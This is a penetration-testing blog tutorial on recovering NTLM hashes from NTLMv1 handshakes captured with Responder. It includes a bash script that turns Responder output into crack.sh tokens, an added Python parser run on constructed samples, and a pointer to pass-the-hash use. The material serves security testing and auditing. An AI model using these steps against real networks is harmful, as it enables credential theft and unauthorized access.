August 15, 2020

Cracking NTLMv1 Handshakes with Crack.sh

Read on if you’d like to learn how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running Responder.py is one of the first tasks performed by most pentesters on internal penetration tests. This tool spoofs multicast name-resolution queries and gives the pentester NTLMv1 and NTLMv2 handshakes. Usually the next step is to attempt to crack those handshakes, at a minimum running them against a wordlist such as crackstation.

An NTLMv1 handshake, however, offers another usually ignored cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake itself, the NTLM hash can be used as a password equivalent in a Windows environment.

Required Reading

MS-CHAPv2 handshakes can be broken into two rounds of 56-bit DES (and a third round using only 2 bytes of the keyspace), which Moxie demonstrated could be cracked by modern FPGAs (https://www.youtube.com/watch?v=sIidzPntdCM).

NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).

How do we exploit this?

Use the crack.sh site to extract the NTLM hash from any MS-CHAP or NTLMv1 handshake for $20. You need to convert the handshake into a token rather than submit the Responder output directly, because the site doesn’t accept the raw challenge/response.

Use the script below to convert the Responder output to a token that will be accepted by crack.sh.

#!/bin/bash

if [ $# -lt 1 ]
then
    echo "Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> ..."
    exit 1
fi

for i in "$@"; do
    for hash in $(cat "$i"); do
        # Responder NTLMv1 line format: user::domain:lmresp:ntresp:challenge
        user=$(echo "$hash" | cut -f1 -d:)
        domain=$(echo "$hash" | cut -f3 -d:)
        lmresp=$(echo "$hash" | cut -f4 -d:)
        ntresp=$(echo "$hash" | cut -f5 -d:)
        srvchallenge=$(echo "$hash" | cut -f6 -d:)

        # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html
        # With Extended Session Security the LM response is the 8-byte client
        # challenge followed by 16 zero bytes, and the challenge the DES rounds
        # were keyed against is MD5(server challenge + client challenge) truncated to 8 bytes.
        if [ "${lmresp:16:32}" == "00000000000000000000000000000000" ]
        then
            clientchallenge=${lmresp:0:16}
            combinedchallenge=$srvchallenge$clientchallenge
            srvchallenge=$(echo "$combinedchallenge" | xxd -r -p | md5sum -b | cut -c1-16)
        fi

        echo
        echo "user:$user"
        echo "domain:$domain"
        echo "lmresponse:$lmresp"
        echo "ntresp:$ntresp"
        echo "challenge:$srvchallenge"

        # Build the crack.sh token with chapcrack if it is installed, otherwise print the command to run
        chapcrack=$(locate chapcrack.py | head -1)
        if [ -e "$chapcrack" ]
        then
            "$chapcrack" radius -R "$ntresp" -C "$srvchallenge"
        else
            echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
        fi
    done
done

Upload this token to crack.sh, give them 20 dollars, and wait for your NTLM hash.
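As an added example that is not part of the original post, Responder or chapcrack, the same field extraction and Extended Session Security challenge derivation in Python, plus a check that tells NTLMv1 lines apart from NTLMv2 ones (useful when auditing which hosts still negotiate NTLMv1). The Responder lines below are constructed; none of the hex values come from a real capture.

```python
import hashlib

# Constructed sample lines in Responder's NTLMv1 format (user::domain:lm:nt:challenge)
# and one NTLMv2 line (user::domain:challenge:ntproof:blob). Values are made up.
SAMPLE_ESS = ("alice::CORP:" + "1122334455667788" + "0" * 32 + ":"
              + "a" * 48 + ":" + "0123456789abcdef")
SAMPLE_PLAIN = "bob::CORP:" + "b" * 48 + ":" + "c" * 48 + ":" + "fedcba9876543210"
SAMPLE_V2 = "carol::CORP:" + "1122334455667788:" + "d" * 32 + ":" + "e" * 120

ESS_PAD = "0" * 32  # 16 zero bytes that follow the 8-byte client challenge


def ess_effective_challenge(srv_hex, client_hex):
    """NTLMv1 with Extended Session Security: the DES rounds are keyed against
    MD5(server_challenge || client_challenge)[:8], not the raw server challenge
    (MS-NLMP; the samba-technical post linked in the script above)."""
    return hashlib.md5(bytes.fromhex(srv_hex + client_hex)).digest()[:8].hex()


def is_ntlmv1_line(line):
    """True when field lengths match NTLMv1: 24-byte LM and NT responses and an
    8-byte challenge. NTLMv2 lines carry a 16-byte NTProof and a long blob."""
    parts = line.strip().split(":")
    return (len(parts) == 6 and len(parts[3]) == 48
            and len(parts[4]) == 48 and len(parts[5]) == 16)


def parse_ntlmv1(line):
    """Return the handshake fields plus the challenge the token needs: the raw
    server challenge, or the ESS-derived one when the LM response is
    client_challenge + 16 zero bytes."""
    if not is_ntlmv1_line(line):
        raise ValueError("not an NTLMv1 handshake line")
    user, _, domain, lmresp, ntresp, srv = line.strip().split(":")
    ess = lmresp[16:] == ESS_PAD
    challenge = ess_effective_challenge(srv, lmresp[:16]) if ess else srv
    return {"user": user, "domain": domain, "lmresp": lmresp,
            "ntresp": ntresp, "ess": ess, "challenge": challenge}


if __name__ == "__main__":
    for sample in (SAMPLE_ESS, SAMPLE_PLAIN, SAMPLE_V2):
        if not is_ntlmv1_line(sample):
            print(sample.split(":")[0], "is not NTLMv1, skipping")
            continue
        h = parse_ntlmv1(sample)
        print(h["user"], "ESS" if h["ess"] else "plain", "challenge", h["challenge"])
```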

Another Hash?

Yes, NTLM hashes are password equivalents in a Windows environment. To leverage your newly acquired NTLM hash, use a tool like wmi-pth.